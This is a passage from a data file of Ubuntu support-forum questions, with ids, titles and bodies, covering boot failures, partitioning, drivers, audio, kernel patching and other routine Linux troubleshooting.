from /home and do a fresh install of 12.04 . sorry that was so long : d
312076	how to change phpmyadmin language to english ?	i have install lamp in my ubuntu 12.04 but the language of phpmyadmin is german instead of english . so i want to change this language to english . please tell me the right procedure to change language .
312077	why does pretty much everything depend on gstreamer phonon backend ?	i’ve just installed and configured a minimal kde distro based on the ubuntu 13.04 minimal cd . it’s working really well but i have 1 gripe with it . after installing kde-plasma-desktop gstreamer was automatically downloaded as the phonon backend , which was fine as i’d just replace it with my usual vlc backend and remove phonon-backend-gstreamer . so i remove phonon-backend-gstreamer , which gets removed as expected , and i’ve now got autoremove correctly advising me that some gstreamer-* libs are now not required ; normal behaviour . but…autoremove is also recommending that it removes linux-sound-base , alsa-base etc , some were also included that seemed unrelated to me , such as libsoup . now i know this is not a major issue , as i don’t have to run autoremove , but it’s just bugging me why this is happening . why has a gstreamer backend got such a massive dependency list ? thanks : )
312080	error : no such partition fond grub rescue	before i start you should know that i am completely new to ubuntu . i have windows 7 installed on my computer as well as ubuntu 9.10 . i recently deleted the ubuntu to make room on my computer for some hd movies that i was planning on burning . i am planning to reinstall ubuntu once i 'm done with these movies . since uninstalling ubuntu i am no longer able to boot my windows 7 or do anything on my computer . now when i try to start my computer the only message that i get is : grub loading . error : no such partition grub rescue > my computer is stuck at this point . i need help getting my computer working again . i want to keep the grub loader because i planning on reinstalling ubuntu . if anyone can help me it would be greatly appreciated .
312082	boot failure after disk manipulation	my 32bit 12.10 system wo n't boot . i used gparted to increase the boot partitionâs size because updates were not working . as expected , the system needed boot fix . i have tried the boot repair option from a live usb disk with no luck . the required purge grub2 command failed ! i would appreciate some guidance as how to proceed . thanks .
312083	total newbie confused about partitions	i am totally fed up with vista , it has 3 different keyboard settings ( azerty qwerty and qwertz ) depending on the software used ( or the time of day ) and freezes 7 times an hour or more often if it`s a windy day . i live on the 5th floor and i do not want to become a murderer ... instead i really want to try out ubuntu with a view to totally getting rid of vista ( rather than doing a total reinstall or upgrading to w7 ) if i feel comfortable using ubuntu . i have done some reading & research but i`m rather confused about the whole issue of partitionning ie can i do that if i already have the following partitions : boot : 75gb used 47.5gb free ( system ntfs ) recover : 7.20gb used 19.20gb free ( system fat32 ) on a medion ( aldi ) laptop from 2007 with the following specs : intel core2duo t5250 @ 1.50 ghz 2.0gb ram mobile intel 965 express chipset family also i don`t quite understand live cds beyond that they are the operating system equivalent of perfume testers . i got some cds from recent magazines i bought ( ubuntu 13.04 and 12.10 - both 32bit ) , can i use these as live cds ? if so how do i do that ? do i need to press a key when rebooting ? many thanks in advance . best regards , misa
312091	ubuntu terminal not displaying unicode properly	i 'm on 13.04 32-bit version . i 'm working on this regex library with unicode features . the problem is when there is unicode characters to display in the terminal it does n't display in the proper manner . take a look at the image please : the expected way is this i think terminal can render unicodes but the spacing and joining letters with marks is out of order . i 've done some googling but unable to find any relevant post . is there any suggestions ? thanks .
312098	wifi and ethernet is not working on 13.04	i have lenovo laptop g780 . i have windows 8 pre-installed and just installed linux 13.04 . nether wifi nor ethernet is working . i checked software updates and there is nothing in addition driver tab .
312100	short battery life dell 15 3521 in preinstalled ubuntu	i have recently bought this laptop with preinstalled ubuntu 12.04 ( 64bit ) . surprisingly it runs less than two hours in battery mode . but it runs around 4-4.30 hrs in windows7 . i had noticed that all the dell laptop has short battery life in linux . i do n't have any graphics card and also do n't have any fan issue ( constantly running ) . my question is why ubuntu ca n't give better lifetime for dell where almost all other laptop has better battery life in ubuntu than windows .
312102	sync and image resize	i 'm looking for a soloution to my slightly ususual problem . i have two folders , folder a and folder b. folder a contains a directory structure of photo albums . photos are regularly added/removed and are high resoloution . i 'd like to sync folder b with folder a ( add/remove photos to mirror folder a 's contents ) but also resize the images so that folder b has an identical structure but lower res `` thumbnail '' images . many thanks for advice in advance !
312103	will windows 8 removal and secure boot disable cause no problem in using ubuntu ?	i heard that recent laptop computer with windows 8 operating system enables secure boot which can cause problem while installing or using ubuntu , and worrying because i have a plan to buy laptop with windows 8 ( dell inspiron 15z ) but want to use ubuntu with no problem . so my question is if i remove windows 8 from my windows 8 pre-installed laptop and disable the secure boot option , will ubuntu normally installs and runs with no problem in my laptop computer ? thanks for your answering : )
312104	backports on ubuntu server ?	i 'm considering migrating from debian to ubuntu server . i have read several posts on this site about the differences . i like the 5 year support . but then i realised that on debian i have sometimes needed later versions of packages ( e.g . drush ) and i 've been able to install these by use of the backports repository . ubuntu has a backports project but this does not look offical/suitable for ubuntu server ? so does it require a full upgrade to the latest ubuntu server lts ( e.g . might be 14.04 ) ?
312105	installing ubuntu 13.04 minimal on an intel atom d2500hn based system	i 'm trying to install ubuntu 13.04 minimal on a new intel atom d2500hn based system . the full desktop install runs absolutely fine ( but cripplingly slow ) and i can get lubuntu running from the cd without issue as well ( though i have n't tried installing it ) . the minimal installer appears to complete without issue , but when it comes to boot i just get a blank screen . i think it 's having trouble displaying the text mode screen ( i 've tried switching to an alternate tty using the lubuntu demo and that seems to hang , however i do n't know if the basic lubuntu setup would have left the other tty 's enabled ) . does anyone have any advice on how i can get this to start properly ? edit it 's also worth noting that having re-installed with ssh i can access the system fine , so everything else is obviously running fine .
312106	putting ubuntu server on to a networked hdd	firstly , i know very little about servers and secondly the 1tb hdd i have has network capabilities , but no software is installed on it , so when connected to the computer it is seen as a network connection , but not as a drive . any advice on how to get started would be great . up until now , i have been using it as a usb drive which worked well , but when this is sorted , i would like it to be connected directly to our bt homehub accessible through the wifi for all the family to use as a film and back up repository . i would then be able to set up individual accounts for each family member to use and may be , if possible , make it accessible from outside locations . the first question then is : how can i install ubuntu server on the 1tb hdd attached directly to the computers network port but which does n't show up in nautilus ? hdd western digital 1.0tb lba 1953525168 model : wd10eacs-00db0 dcm : dhrnht2cf
312111	using multiple cheap server to scale my website needs , which technology ?	i have developed a website that is running on mysql/php/apache and it is performing quite well . but with more users uploading their stuff the space available on my server is reducing and eventually i will need some more computing power if the up trend stay . what i will like to do is to be able to run an ubuntu server and increase specs ( disk space , cpu power ) adding other cheap server . my host allow me to connect machine trough direct gigabit networks machines but suggestion on this matter are also welcomed . : = i do not want use any expensive cloud server or managed stuff because budget is tight an i am fairly happy with my servers . the main question is , which one is the technology/program that i can investigate and eventually use to achieve this goal ? i have been reading a bit ( openstack , clustering , etc ) & searching but more i read more i get confused . the best would be something stable , fairly simple to set up and use even if performance & customization wo n't be top class ... it will be great to have some suggestion . thanks !
312112	mythbuntu initial setup cannt connect to server	i 'm really new to linux , and i just installed mythbuntu to a standalone pc , it 's all installed ok and i 've logged on , and started the setup but i 'm having issues . i select language ok , the next screen is database setup , select next but it says ca n't connect to server and i just loop back . i 've done some googling and checked the mysql database password and that is correct , i 've also checked that my username belongs to myth tv and it does . can anyone help ? i 've tried reinstalling but it does n't change . many thanks .
312114	how do i install a real-time kernel with a patch i need to apply ?	i have ubuntu 12.04 with kernel 3.5 . i have to install the rt_preempt patch and i followed these steps : sudo apt-get install kernel-package fakeroot build-essential libncurses5-dev mkdir -p ~/tmp/linux-rt cd ~/tmp/linux-rt wget http : //www.kernel.org/pub/linux/kernel/v3.x/linux-3.4.tar.bz2 wget http : //www.kernel.org/pub/linux/kernel/projects/rt/3.4/older/patch-3.4-rt7.patch.bz2 tar xjvf linux-3.4.tar.bz2 cd linux-3.4 patch -p1 < < ( bunzip2 -c ../patch-3.4-rt7.patch.bz2 ) cp /boot/config- $ ( uname -r ) .config & & make oldconfig make -j8 sudo make modules_install sudo make install but while booting up the kernel it 's showing the kernel panic : kernel panic - not syncing . attempting to kill init ! i tried installing kernel 3.8 as well . but its showing error while executing the make -j8 command .
312120	livewallpaper on gnome3	is there a way to have live wallpapers like galaxy and nexus on gnome 3 . i have managed to get them running on unity but not on gnome 3 .
312121	how to create a shell account and restrict users to their home folder	i was wondering how in ubuntu server 13.04 , how to limit a user to be able to only access their home folder and nothing else on the server . thanks , stephen
312122	`` fontconfig warning : ignoring c.utf-8 : not a valid language tag ''	i wanted to know what happens with my installation of ubuntu 13.04 64bit . it stops detecting file systems and says the thing i said in the top : `` fontconfig warning : ignoring c.utf-8 : not a valid language tag '' over and over again.. please help thank you
312124	how to remove ubuntu 11.10 from dual boot	i upgraded from 11.10 to 12.04lts using iso file i downloaded . but i realized that 12.04lts is installed in parellel with 11.10 . how do i remove 11.10
312130	ubuntu for tablet	i have a samsung galaxy note 10.1 . i am interested in converting the os to ubuntu . when you have a beta version , i would love to trial it . thanks lee
312133	sync tomboy notes	i have notes synced via tomboy web . now i reinstalled my system and i am trying to setup but it requires me to connect to a server . what is the server 's name ?
312134	uninstalling wubi	i installed wubi in a 30gb partition and i wanted to delete that so that i could install ubuntu via usb with a larger partition . so i went to the control panel to find ubuntu but it wasnât there . i decided to go into the c drive and deleted the ubuntu file . but now every time i boot up it asks me to choose windows 7 and ubuntu ( like i still have dual boot ) and if i choose ubuntu it says `` windows could not find this file '' and then says the path of the file . what should i do to remove this old wubi/ubuntu ?
312136	install netgear wna1000m on ubuntu server 12.04 lts	i have been looking all day on the internet for a solution to installing the netgear wna1000m wifi usb dongle on my linux ubuntu server 12.04 lts . i found some interesting articles on this forum as well on others and i 've been gone through some steps succesfully to identify the usb dongle . what i did : lsusb and after this : modinfo 8192cu | grep 9041 the last command gave me an error which said that the module could not be found . i hope you guys can help me out on installing this wifi dongle . i 'm actually very new to ubuntu , but i 'm willing to learn a lot of the linux os and i hope you guys can tell me why and how you did some steps , even if they might be basic . thanks already ! you can correct my english if i said something incorrect , because it 's not my native language
312138	how do i change the date format in gnome 3 shell ?	i want to change the date/time format on the top panel to a format close to rfc 3339 / iso 8601 , like one of these : % f % t → 2013-06-24 16:13:00 % f % a % t → 2013-06-24 mon 16:13:00 % a % f % t → monday 2013-06-24 16:13:00 i know unity has a preference somewhere hidden away in dconf , this is how i did it in unity , but i ca n't find such a preference for gnome 3 shell . preferably , i 'd also like to set one of these as my system-wide date/time locale preference .
312139	will installing ubuntu using wubi erase windows ?	i have an hp laptop with 2 partitions : c : and d : , with windows 7 installed in the c : drive and d : is the recovery partition . when i try to install ubuntu 12.04 lts using wubi , it only shows the c : drive for installing and not the d : drive where i wanted to format and install ubuntu . so , if i go ahead and install in the c : drive where windows 7 is already installed , would wubi erase windows 7 ? or it will just install ubuntu as a program in windows ?
312146	ubuntu does n't start and i ca n't login	my ubuntu 13.04 does n't boot anymore . eternal black screen . if i press alt+ctrl+f1 i see that it 's stucked on `` checking battery state [ ok ] . '' i 'd like to try to go with sudo apt-get install gdm but i ca n't login on terminal tty2 , tty3 etc . they correctly ask for my nickname , then they make me wait a lot , ask for password and make me wait again . after a lot of time ( ... a lot ) the best i could achieve was visualizing `` documentantion https : //help.ubuntu.com '' . i can never reach the point where i can give commands . plus , during the long pauses , every 2 minutes it gives a messagge like this : info : task xxx blocked for more than 120 seconds . any suggestion ? sorry for my bad english and thanks everyone for the attention .
312150	drivers for hp xw6200	i am using computer from 10 years , now i am going try ubuntu 13.04 . i have hp workstation xw6200 , please help me to download drivers for this pc for ubuntu 13.04 . it will be my first try to install ubuntu , but i want to download drivers first .
312151	how can nautilus autodiscover a nas ?	i have two machines : a 12.10 which autodiscovers my nas fine and a 13.04 which does not autodiscover the nas in nautilus . the latter does not display the drive in nautilus . i did install samba on the 13.04 , i think a while ago , but i can not remember what i did . before i connected to the drive using afp , now i notice the 12.10 uses smb . how can i make my 13.04 autodiscover the nas and how should i configure it ?
312158	how come i can not make this file executable ( chmod permissions ) ?	i downloaded android development tool for linux ( adt ) and placed it in home directory . after unzipping the files , when i double click the `` eclipse '' executable file ; the eclipse works perfectly fine . but if i unzip the adt in a different directory , in my case directory e : ( is shown when i boot in windows 7 ) there double clicking the same `` eclipse '' executable file does not run eclipse . it shows error message : could not display /media/software/00.androidlinux/adt/eclipse/eclipse . there is no application installed for executable files . do you want to search for an application to open this file ? if i press yes in the dialog , it finds `` pypar2 '' which is not my solution . i found that the `` eclipse '' file permission is following -rw -- -- -- - 1 tanvir tanvir 63050 feb 4 19:05 eclipse i tried to change the permission by `` chmod +x eclipse '' , but no use . this command does not change the file permission at all in this case . what should i do ? relevant output of cat /proc/mounts : /dev/sda6 /media/software fuseblk rw , nosuid , nodev , relatime , user_id=0 , group_id=0 , default_permissions , allow_other , blksize=4096 0 0 please not that i 'm new to ubuntu and still learning day by day .
312160	where can i download ubuntu for laptops ?	i have an hp dv4 laptop and ca n't find the ubuntu download . i want to remove my microsoft windows 7 os instalation . i tried looking for the download , but ca n't find it . can someone please help me ?
312161	virtualbox blank usb filter - now mouse and kb doesnt work	experimenting with usb filters , i created a blank filter and now both the mouse and kb do n't work for both the guest and the host . is there any way i can regain control without rebooting the server ? ( ubuntu server 12.04 )
312163	path-variable gets always reset . how to fix that ?	a little time ago , i found out , that i can create custom commandterminals with expanding the path-variable . unfortunately , it gets always resettet , when i close the terminal and opens it again . do you know how to fix this problem ? because when i want to start a few scripts with terminalcommands , i do n't want to expand the path-variable everytime before ...
312164	wheres my memory going ?	my machine keeps 'freezing ' before eventaully logging out with all the programs exiting . this is rather annoying , and i think its because i keep running out of memory . i am not running any custom software , just netbeans , chrome etc . ( stuff i usually run on other ubuntu computers without issue ) . for some reason my memory usage is through the roof as seen here , but i ca n't quite figure out why . here is a screenshot which may be useful with htop and gnome-system monitor open as user and as root . i notice that my console-kit-daemon is taking up about a gig of 'virtual memory ' . is that normal ? any tips/advice will be helpful . in the meantime i have ordered 2 x 4 gig ram sticks to try and just throw hardware at the issue .
312165	how to install sip+pyqt with apt-get + pip + virtualenv ?	[ i originally posted this question , under a different title , in stackoverflow ( here ) , but later i realized that my problem is very specific to apt-get , hence i am re-posting it here . sorry for the duplication . ] i 'm trying to install pyqt on ubuntu ( and within a virtualenv ) . the list of obstacles i 'm dealing with is far too long to include here , but the one i 'm currently trying to get past is this : % workon myvenv ( myvenv ) % cd ~/.virtualenvs/myvenv/build/pyqt ( myvenv ) % python ./configure.py traceback ( most recent call last ) : file `` ./configure.py '' , line 32 , in < module > import sipconfig ok , so let 's install sipconfig ... ( myvenv ) % pip install sip downloading/unpacking sip downloading sip-4.14.8-snapshot-02bdf6cc32c1.zip ( 848kb ) : 848kb downloaded running setup.py egg_info for package sip traceback ( most recent call last ) : file `` < string > '' , line 14 , in < module > ioerror : [ errno 2 ] no such file or directory : '/home/yt/.virtualenvs/myvenv/build/sip/setup.py' complete output from command python setup.py egg_info : traceback ( most recent call last ) : file `` < string > '' , line 14 , in < module > ioerror : [ errno 2 ] no such file or directory : '/home/yt/.virtualenvs/myvenv/build/sip/setup.py' -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- command python setup.py egg_info failed with error code 1 in /home/yt/.virtualenvs/myvenv/build/sip storing complete log in /home/yt/.pip/pip.log the only recipe i 've found so far installing sip is this % python configure.py % make % sudo make install ... but this recipe goes against my policy of doing all my ubuntu installations either through apt-get ( or through pip in the case of python modules ) . is there some way that i can install sip with apt-get ( and possibly pip ) ?
312170	where is ubuntu-tweak ?	i have a netbook and i need to clean it , i got odkas on ubuntu-tweak , and skousela be installed by navodu . ale unfortunately i have not found it nor the software for ubuntu , though here it skousela look so show me dostupny . jako not from there at all neni . prosim advice about how accurate the description should he do it so i could nainstalovat . a please can i come up with some error about everything in the computer mam ? original post in czech
312172	how to maintain a file 's 'last modified ' date ?	i 'm copying files and folders over from one filesystem to another ( both are ext3 ) via cp in the terminal . the 'date modified ' on all of the files are being changed to the current time although i am not modifying the folder or the files . i 'd like for them to keep their existing 'last modified date ' which vary within the past 5 years . i am not interested in changing them to a specific date as described this previous question , but to maintain the existing 'last modified ' date . i 'm using 12.04 .
312173	installing gflags 12.04	i want to install libgflags-dev . according to this launchpad link , it is present in the ubuntu repositories : https : //launchpad.net/ubuntu/+source/gflags and http : //packages.ubuntu.com/raring/libdevel/libgflags-dev but when i try to sudo apt-get install it , i get e : unable to locate package libgflags-dev why is this happening ? i have all multiverse and universe enabled from software center . how to install it from apt-get ? p.s . i know i can simply download the binary and make install it , but i want to know how to do this from apt-get .
312176	java 7 jdk wont uninstall	i installed jdk 7 but minecraft didnt work . i tried uninstalling it in many ways but it was still on the machine and minecraft still didnt work . does anynone know how to fix this ? my ubuntu version is 12.04 lts . ive searched the internet and i cant find anything that works . whenever i try something new java 7 still appears in dash home and minecraft still gets black screen . after trying a few new things minecraft wont even open i tried sudo apt-get purge , apt-get remove and a lot of other commands.i cant quite remember the ppa but i think it was http : //www.launchpad.net/webupd8/java7 that might not be correct but thats what i remember . i also tried to mod minecraft by deleting meta-inf and adding minecraft forge .
312188	ubuntu 13.04 freezes after boot or suspend ( every other time )	i 'm running 13.04 on asus ul30a process : genuine intel® cpu u7300 @ 1.30ghz × 2 graphics : mobile intel® gm45 express chipset os type : 64-bit everything completely freezes after every other a boot or suspend . no keyboard or mouse . it happens every other time . it freezes , i reboot and it works work . next time i will reboot , it will freeze again . this never happened with 12.10 . any advice on how to fix this ?
312194	what format does evolution store its mail in ?	my evolution ( 3.0.3 ) has a maildir directory : ~/.local/share/evolution/mail/local/ cur/ # # # # # # # # # # . # # # # # # _ # .username:2 , s cur/ # # # # # # # # # . # # # # # # _ # .username:2 , s folders.db new/ tmp/ folders.db says something about sqlite in it , i ca n't tell if there are mail messages in that file ; the files under cur seem to have messages in them ; but they are not in mbox format , and it does n't look like all of the messages that i have under `` on this computer '' are in these files . there is no ~/.evolution/ directory . how ( and where if i 'm not looking in the right place ) does evolution store its email ?
312195	error saving to mbr	i get the following error when i try and save to mbr in grub customizer . it used to work ok , it there something i need to do to make changes to the grub menu stick ?
312204	running gedit as sudo	i 'm really new and from the dark side ( windows ) ... i must be doing something wrong . the only way i can get gedit to run with a tool bar ( save as etc . ) is to launch it with sudo from a terminal . i have the same issue with filezilla . it runs in 'kiosk ' mode ( wont save passwords ) unless its launched with sudo . is there some setting for me as a regular user , that will allow these applications to run in 'adult ' mode when placed on the left icon bar on the desktop ? i see filezilla has irritated other and maybe that 's the way it is , but gedit ? should n't i be able to have a full featured text editor without becoming a root user ? p : )
312205	unable to access internet from devices connected over wifi hotspot with ubuntu 13.04	i am using ubuntu 13.04 and till couple of days back i was able to connect to internet using the hotspot connection i had created previously when i started using ubuntu 10 ... but two days back i noticed that devices are getting connected to wifi but are not able to access internet.. i deleted my old wifi hotspot and created a new one by going to network settings and there by clicking create a hotspot option.. i logged in from my wife 's laptop which is running on windows 7 . it was able to establish connection but was not able to access the internet.. same is happening with my iphone too i am able to connect to hotspot but for some reason it is not able to access internet ... any help would be highly appreciated..
312207	wich smarthpones can have ubuntu software ?	i have a smartphone lg optimus 3d max . can my android have ubuntu ?
312213	installing ubuntu on an older laptop	i am trying to install ubuntu on an older laptop . i made a bootable cd and restarted the computer . the following error came up : this kernel requires the following features not present on the cpu : pae unable to boot - please use a kernel appropriate for your cpu . thanks for your help !
312217	ubuntu not booting from cd or usb , how can i make sure os finds my drive ?	i 've been trying several different installation methods to install ubuntu on my partition . no matter what kind of installation type ( cd or usb ) , i get the same error message . at first i assumed i was using the incorrect ubuntu version but i 'm quite confident i 'm on the right path after this question : which ubuntu iso should i burn for my system ? i am trying to install ubuntu on a machine that has windows 8 natively installed according to this answer by luis alvarado : installing ubuntu on a pre-installed uefi supported windows 8 system uefi is on , secure boot is off and the disc/usb loads properly . from the cd i simply get the error message when booting , but when booting from usb ( created usb according to http : //www.ubuntu.com/download/desktop/create-a-usb-stick-on-windows ) i get to choose to run ubuntu without installing , or to install it . either ( both ) of these options gives me the following error message : ata_id [ 334 ] : hdio_get_identity failed for '/dev/sdd ' : invalid argument user 'thefourtheye ' suggested in my previous question that this error message is due to that the os is unable to identify by disk drive . that is entirely possible - but how do i solve it ? some say that there 's something wrong with the drivers for ubuntu to id the usb , and that i could write my own drivers for that . it seems a bit over my head though . burning program used was imgburn for the cd , from setupimgburn_2.5.7.0.exe . i burnt the image to the disc , it was recognized as a boot disc and when inspecting the cd 's content it looked as it should according to https : //help.ubuntu.com/community/bootfromcd any help is appreciated .
312220	gammu smsd server unresponsive	i have an enfora modem connected to a serial port on my server machine ( which i access via ssh since it is remote ) running ubuntu . basically , it is a gsm modem that can communicate through a gsm network to talk to gps devices which also have gsm modem . i am using gammu-smsd to scan the gsm modem for received messages , then store them in postgresql database , and send the messages to the cell phones of users . it has been working but suddenly stopped working . my /etc/gammu-smsdrc is configured . none of that configuration changed . i still have the port set to /dev/ttys0 . i checked the postgresql database and it is running . and that is the database that gammu-smsd is configured to use . now gammu-smsd logs to my syslog file and this is the latest output from it : jun 24 14:20:01 porkypig cron [ 32512 ] : ( www-data ) cmd ( [ -x /usr/lib/cgi-bin/awstats.pl -a -f /etc/awstats/awstats.conf -a -r /var/log/apache2/access.log ] & & /usr/lib/cgi-bin/awstats.pl -config=awstats -update > /dev/null ) jun 24 14:20:18 porkypig gammu-smsd [ 32416 ] : starting phone communication ... jun 24 14:20:28 porkypig gammu-smsd [ 32416 ] : error at init connection no response in specified timeout . probably phone not connected . ( 14 ) jun 24 14:20:28 porkypig gammu-smsd [ 32416 ] : terminating communication no response in specified timeout . probably phone not connected. , ( 14 , 250 times ) jun 24 14:20:28 porkypig gammu-smsd [ 32416 ] : going to 30 seconds sleep because of too much connection errors jun 24 14:20:58 porkypig gammu-smsd [ 32416 ] : starting phone communication ... jun 24 14:21:08 porkypig gammu-smsd [ 32416 ] : error at init connection no response in specified timeout . probably phone not connected . ( 14 ) jun 24 14:21:08 porkypig gammu-smsd [ 32416 ] : terminating communication no response in specified timeout . probably phone not connected. , ( 14 , 250 times ) jun 24 14:21:08 porkypig gammu-smsd [ 32416 ] : going to 30 seconds sleep because of too much connection errors jun 24 14:21:38 porkypig gammu-smsd [ 32416 ] : starting phone communication ... jun 24 14:21:38 porkypig gammu-smsd [ 32416 ] : ca n't open device ( error opening device . unknown , busy or no permissions . :2 ) jun 24 14:21:38 porkypig gammu-smsd [ 32416 ] : using pgsql service jun 24 14:21:38 porkypig gammu-smsd [ 32416 ] : disconnecting from postgresql then does n't look to comforting . when i run sudo minicom it says initializing modem and displays this : welcome to minicom 2.4 options : i18n compiled on jan 25 2010 , 07:02:36 . port /dev/ttys0 press ctrl-a z for help on special keys but then all it gives me is a blinking cursor and typing does n't do anything . any idea what might be wrong here ?
312225	need some info about wine	i often come across something called 'wine ' . i read that it is a compatibility program for other operating systems . what is it exactly and what is it used for and how ?
312226	how do i get sound output on hdmi without the need to start x ?	i have a headless machine connected to my sound system , and i am using it to run a music playing daemon that i control over the network . ( among other things ) however , i ca n't seem to be able to have sound come out of my speakers without running x. i am running pulse audio in a system wide instance and my daemon is not running within x . nevertheless , when my daemon is playing music without me hearing it , i can fix it by running startx in an unrelated session . after x starts , i can hear the sound . the sound disappears again if i kill the x server . interestingly/annoyingly , the sound also stops after x has been running for a few minutes . this could possibly be because of a screen saver of some sort , but i have n't been able to verify or falsify this theory . so my current workaround is to ssh into the box whenever i want music and startx , and restart it every fifteen minutes or so . i 'd like to do better . i have been able to verify the following : adjustments in alsamixer have no effect on this problem . the relevant output channel is never muted in alsamixer , i can see no difference between when the sound is working and when it isn't nothing is muted in pactl list there is no difference in the output from pactl list between before starting x and after it 's started . ( except the identifier of the pactl instance connected to pulse , which is different each time you run pactl ) the user running the music daemon is a member of the groups audio , pulse and pulse-access the music daemon program does not report any error messages and acts as if it is playing the music like it should some form of dbus daemon is running . ps aux|grep dbus reports dbus-daemon -- system -- fork -- activation=upstart before and after i have started x some details about my hardware : motherboard : http : //www.asus.com/motherboards/at5ionti_deluxe/ sound chip : nvidia gpu 0b hdmi/dp ( from alsamixer ) using hdmi for output ( machine also has an intel realtek alc887 that i am not using ) output of lsmod : module size used by deflate 12617 0 zlib_deflate 27139 1 deflate ctr 13201 0 twofish_generic 16635 0 twofish_x86_64_3way 25287 0 twofish_x86_64 12907 1 twofish_x86_64_3way twofish_common 20919 3 twofish_generic , twofish_x86_64_3way , twofish_x86_64 camellia 29348 0 serpent 29125 0 blowfish_generic 12530 0 blowfish_x86_64 21466 0 blowfish_common 16739 2 blowfish_generic , blowfish_x86_64 cast5 25112 0 des_generic 21415 0 xcbc 12815 0 rmd160 16744 0 bnep 18281 2 rfcomm 47604 12 sha512_generic 12796 0 crypto_null 12918 0 parport_pc 32866 0 af_key 36389 0 ppdev 17113 0 binfmt_misc 17540 1 nfsd 281980 2 ext2 73795 1 nfs 436929 1 lockd 90326 2 nfsd , nfs fscache 61529 1 nfs auth_rpcgss 53380 2 nfsd , nfs nfs_acl 12883 2 nfsd , nfs sunrpc 255224 16 nfsd , nfs , lockd , auth_rpcgss , nfs_acl btusb 18332 2 vesafb 13844 2 pl2303 17957 1 ath3k 12961 0 bluetooth 180153 24 bnep , rfcomm , btusb , ath3k snd_hda_codec_hdmi 32474 4 nvidia 11308613 0 ftdi_sio 40679 1 usbserial 47113 6 pl2303 , ftdi_sio psmouse 97485 0 snd_hda_codec_realtek 224173 1 snd_hda_intel 33719 5 snd_hda_codec 127706 3 snd_hda_codec_hdmi , snd_hda_codec_realtek , snd_hda_intel serio_raw 13211 0 snd_seq_midi 13324 0 snd_hwdep 17764 1 snd_hda_codec snd_pcm 97275 3 snd_hda_codec_hdmi , snd_hda_intel , snd_hda_codec snd_rawmidi 30748 1 snd_seq_midi snd_seq_midi_event 14899 1 snd_seq_midi snd_seq 61929 2 snd_seq_midi , snd_seq_midi_event snd_timer 29990 2 snd_pcm , snd_seq snd_seq_device 14540 3 snd_seq_midi , snd_rawmidi , snd_seq snd 79041 20 snd_hda_codec_hdmi , snd_hda_codec_realtek , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm , snd_rawmidi , snd_seq , snd_timer , snd_seq_device asus_atk0110 18078 0 mac_hid 13253 0 jc42 13948 0 soundcore 15091 1 snd snd_page_alloc 18529 2 snd_hda_intel , snd_pcm coretemp 13554 0 i2c_i801 17570 0 lp 17799 0 parport 46562 3 parport_pc , ppdev , lp r8169 62154 0 any ideas ? what does x do that 's so important ?
312233	ubuntu doest not boot after installation of window 8	i had ubuntu 12.04 , then i installed window 8 in another partition on my system . after installing win8 , my system is not able to boot to ubuntu . that is when i start my system it boots to win8 . i lost my access to ubuntu , if anyone can help me please .
312239	do i need to know c++ to develop ubuntu app ?	i 'm a java developer . i dont know much about c++ . should i learn c++ to develop ubuntu app ? or can develop app without c++ ?
312241	how to administer , manage & update 40 to 50 kubuntu laptops ?	i have a custom developed application presently running on about 40 kubuntu laptops ( & more planned ) . every few months i have to update the application . i also have to run ubuntu updates and a few other minor things . i 've been doing it manually , one by one , using team viewer to log into each client . i would like to dramatically improve this process . can anyone suggest an approach ( and tools ) ? this is not an enterprise , i am not a sysadmin , and i prefer a simple solution . to update my application presently , i have to use command line tools ( as root ) and i have to have access to the gui in order to run the application . team viewer allows me to do this . my question is , `` how can i automate the process of updating my custom application on 40+ laptops ? '' i 'm most familiar with bash scripts and ssh . as far as what have i considered or investigated so far , i googled a bit and the names of puppet & chef came up . but i read this : people have been advocating tools like chef and puppet for solving exactly those problems . both of them are solid tools , but they can be quite daunting . so those options are not for me . i also heard about sprinkle , but i 'm not provisioning servers - i 'm managing laptops . i came across cuisine next : http : //stackful-dev.com/cuisine-the-lightweight-chefpuppet-alternative.html https : //github.com/sebastien/cuisine # readme fabric is an incredible tool to automate administration of remote machines . as fabric 's functions are rather low-level , you 'll probably quickly see a need for more high-level functions such as add/remove users and groups , install/upgrade packages , etc . cuisine is a small set of functions that sit on top of fabric , to abstract common administration operations such as file/dir operations , user/group creation , package install/upgrade , making it easier to write portable administration and deployment scripts . still , it sounds like i would have to learn python to use cuisine . i 'm willing to do that if it is the right solution . but i would like to ask here if there is a simpler way .
312251	how do i delete java 7 runtime ?	i upgraded to java 7 jdk bur minecraft got a black screen after startup.i found out that java 7 didnt work with linux . when i deleted the jdk , minecraft wouldent even open.every java 7 icon is still there , even though it got erased . i have openjdk6 on the computer too .
312256	is there any program for writing a book ?	is there any program for writing a book ? i tried to find it on some forums and sites , but i really could n't find any .
312259	how to run a script when user logs in ?	i want to register hour and date of users in a network after they login , so , to do it , i want to run a script after every login , and it will create a file contain login hour and date . the problem is : i do n't know how to configure pam_script to run this script after every login . i have to add commands in common-auth file ? i 'm not certainly . help , pelase !
312261	what happens after `ubuntu-bug` has done it 's thing ?	until some time ago you ran apport-bug or ubuntu-bug to start reporting a bug . the system would then open launchpad with your account , upload the collected information and let you add more info to the bug report . now when i run gksudo ubuntu-bug ( for instance with a crash-file as argument ) the common bug dialog appears and thats all . where is the report being sent to ? definitely not to launchpad as a bug report ( although in the concrete situation people have been able to file a report about that bug ) . so : where is this report sent to ( and just maybe ) how can i still file a bug report from my system ( makes uploading of the pertaining files much easier ) could it be that `` the system '' decided that this would be a duplicate of an already existing bug ?
312270	installation loop ?	okay , i have downloaded ubuntu 12.04 lts and i can not get it to install . i have put it onto a 4gb sdhc card and set it to boot up . my problem is that when i try to install , i click on `` install ubuntu inside windows 7 '' and it makes my computer restart . it does absolutly nothing after wards , it just reboots and asks me if i would like to try ubuntu out or install ubuntu . i used linux live usb creator to put ubuntu onto the sd . my comp is a weak 1.66ghz asus netbook . please help ! i feel like im in this strange loop of installation .
